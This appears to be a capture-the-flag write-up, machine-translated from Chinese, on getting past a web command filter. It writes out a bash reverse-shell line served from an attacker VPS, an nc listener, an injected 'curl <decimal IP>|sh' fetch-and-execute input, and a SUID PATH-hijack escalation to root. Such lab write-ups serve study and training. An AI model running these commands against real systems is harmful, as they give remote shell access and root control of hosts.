Open the webpage: I
found a lot of letters and characters filtered:
b,d,e,-,q,f,g,i,p,j,+,k,m,n,<,>,o,w,x,~,:,^,@,&,,%,",*,(,),!,=,.,[,],},{,_);
As a result, many of our commands cannot be operated. Finally, it was observed that it was curl
not filtered.
We can set up the VPS, use the VPS rebound shell to
set the home page of the VPS as:
bash -c "bash -i >& /dev/tcp/IP地址/5555 0>&1"
Open the web service on the VPS, if there is no apache or other middleware, you can use python:
python2:
python -m SimpleHTTPServer 80
python3:
python -m http.server 80
Then open another terminal on vps to monitor port 5555:
nc -lvnp 5555
Assume that the IP address of our VPS is 123.123.123.123, because the page is filtered .
, we cannot directly enter the IP address, and the length will exceed 18.
Therefore, we need to convert the IP address: just click on one
under Baidu search IP 十进制
:
we can see the decimal IP address as: 2071690107
we enter on the page : we ?ip=curl 2071690107|sh
can see the rebound shell on our VPS.
View id
found to be a low-privileged user: www-data
search flag
:
find / -name flag
could not find it. There is no user name in the home directory:
then the flag can only exist in the /root directory, because we don't have permission, so we cannot search.
We need to raise rights to root and
find suid first:
find / -user root -perm -4000 -print 2>/dev/null
Found a strange program: love
Run it:
the result is returned. No input is required.
We download it and reverse it with ida:
it love
is found that the ps
program is running , with two characteristics:
1. The uid is set 0
, that is, root
2. The ps
command does not specify which directory it is under.
Then we can forge the ps
order to raise the authority.
We /tmp
forged ps
commands in the directory . Because the /tmp
directory has writable permissions (other writable directories can also)
cd /tmp # 进入/tmp目录
echo "/bin/bash" >ps #将payload写入ps文件
chmod 777 ps #设置可读可写可执行权限
$PATH #查看环境变量
export PATH=/tmp:$PATH #将/tmp加入环境变量,并放在第一个位置
Then we run love
, found root
the authority
now we will be able to read flag
the
cat /root/flag